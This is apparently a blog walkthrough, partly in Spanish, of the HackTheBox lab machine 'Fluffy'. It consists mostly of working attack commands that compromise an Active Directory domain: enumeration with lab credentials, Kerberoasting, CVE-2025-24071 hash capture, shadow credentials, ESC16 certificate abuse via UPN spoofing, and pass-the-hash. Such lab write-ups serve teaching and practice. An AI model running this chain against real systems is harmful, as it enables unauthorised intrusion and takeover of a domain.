Fluffy
WRITEUP : HTB-Fluffy · HYH's Blog
j.fleischman / J0elTHEM4n1990!
sudo nmap 10.10.11.69 -sS -vvv -Pn -n -p- --min-rate 5000 --open -oG allPorts
sudo nmap 10.10.11.69 -p PORTS -sCV -oN targeted
dnsrecon -a -n 10.10.11.45 -d fluffy.htb
-
A fluffy.htb 10.10.11.69
→ El dominiofluffy.htbapunta a la IP10.10.11.69. -
NS dc01.fluffy.htb
→ El servidor que gestiona la zona DNS esdc01.fluffy.htb. -
SOA dc01.fluffy.htb
→dc01.fluffy.htbes la autoridad principal (servidor principal de zona). -
SRV _kerberos._tcp.fluffy.htb
→ Hay un servicio de Kerberos corriendo sobre TCP en el dominio. Importante en Active Directory. -
SRV _ldap._tcp.fluffy.htb
→ Hay un servicio LDAP (usado para autenticación/consulta de usuarios) corriendo.
ldapdomaindump -u 'fluffy.htb\j.fleischman' -p 'J0elTHEM4n1990!' 10.10.11.6
netexec smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d DOMAIN --shares
smbclient //10.10.11.69/IT -U 'j.fleischman'%'J0elTHEM4n1990!'
netexec winrm 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!'
sudo ntpdate -u 10.10.11.69
Nos saca los TGS de 3 servicios :
impacket-GetUserSPNs fluffy.htb/j.fleischman:'J0elTHEM4n1990!' -request -dc-host DC01.fluffy.htb
Nos saca users
rpcclient -U 'j.fleischman%J0elTHEM4n1990!' 10.10.11.69
No sale ninguno
impacket-GetNPUsers fluffy.htb/ -no-pass -usersfile users.txt
En uno de los archivos se likea que esta vuln está activa:
GitHub - FOLKS-iwd/CVE-2025-24071-msfvenom: metasploit module for the CVE-2025-24071
La explotamos :
sudo responder -I tun0 -wdv
Sacamos la pass de p.agila
bloodhound-python -d fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' -dc fluffy.htb -ns 10.10.11.69 -c All --zip
Esto significa que podemos agregarnos al grupo SERVICE ACCOUNTS
python3.12 -m venv bloodyenv
source bloodyenv/bin/activate
pip install bloodyAD
bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' p.agila
Tiene GenericAll sobre todas las ServiceAccounts
certipy shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
evil-winrm -i 10.10.11.69 -u WINRM_SVC -H '33bd09dcd697600edf6b3a7af4875767'
WINRM_SVC no tiene nada para escalar a admin del dominio
CA_SVC (servidor de certiifcados) tiene una plantilla de certificado con vulnerabilidad EC16
certipy find -vulnerable -u CA_SVC -hashes ":ca0f4f9e9eb8a092addf53bb03fc98c8" -dc-ip 10.10.11.69
Sacamos el UPN original de la cuenta (para luego restaurarlo)
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read
Actualizamos el UPN a administrador para solicitarlo como él
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
Guardamos autenticación por kerberos
certipy shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -account 'ca_svc' auto
export KRB5CCNAME=ca_svc.ccache
Solicitamos certificado para la plantilla de autenticación usuario
certipy req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'
Restauramos UPN al de la cuenta original
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Nos autenticamos como el admin, con nuestro certificado
certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Nos conectamos con evilwin-rm